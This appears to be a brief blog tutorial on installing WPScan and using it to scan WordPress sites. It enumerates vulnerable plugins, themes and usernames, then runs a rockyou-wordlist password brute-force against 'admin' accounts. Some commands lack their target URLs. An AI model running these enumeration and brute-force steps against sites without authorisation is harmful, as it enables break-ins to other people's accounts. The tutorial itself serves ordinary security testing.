Find WordPress Security Vulnerabilities with WPScan

WPScan is a free, for non-commercial use, black box WordPress security scanner written for security professionals and blog maintainers to test the security of their sites.

In this article, we’re going to install and use WPScan hacking tool. Let’s get started:

Table of Contents

  1. Installation
  2. Usage
  3. Examples


WPScan comes pre-installed in Kali Linux. We can easily install WPScan on other distros. Run these commands to install WPScan:

sudo apt install patch build-essential zlib1g-dev liblzma-dev ruby-dev
sudo gem install nokogiri
sudo gem install wpscan

# Or

git clone
cd wpscan/
bundle install && rake install


Type this command to see all available options:

wpscan -h

The output looks like:


Perform a scan of your website:

wpscan --url --rua

Here, --rua (random-user-agent) is used to randomly select the user agent.

Find vulnerable plugins & themes:

# plugins
wpscan --url --rua --enumerate ap

# themes
wpscan --url --rua --enumerate at

Try to find users:

wpscan --url --rua --enumerate u

Perform Brute-force attack: You can download password dictionaries from GitHub and can run attack.

Download password dictionaries:

sudo apt install wordlists
ls /usr/share/wordlists/rockyou.txt.gz
gzip -d rockyou.txt.gz
ls -la /usr/share/wordlists/rockyou.txt

Run attack:

wpscan --url --rua -P /usr/share/wordlists/rockyou.txt -U 'admin', 'admin2'

That’s it. Thanks for reading.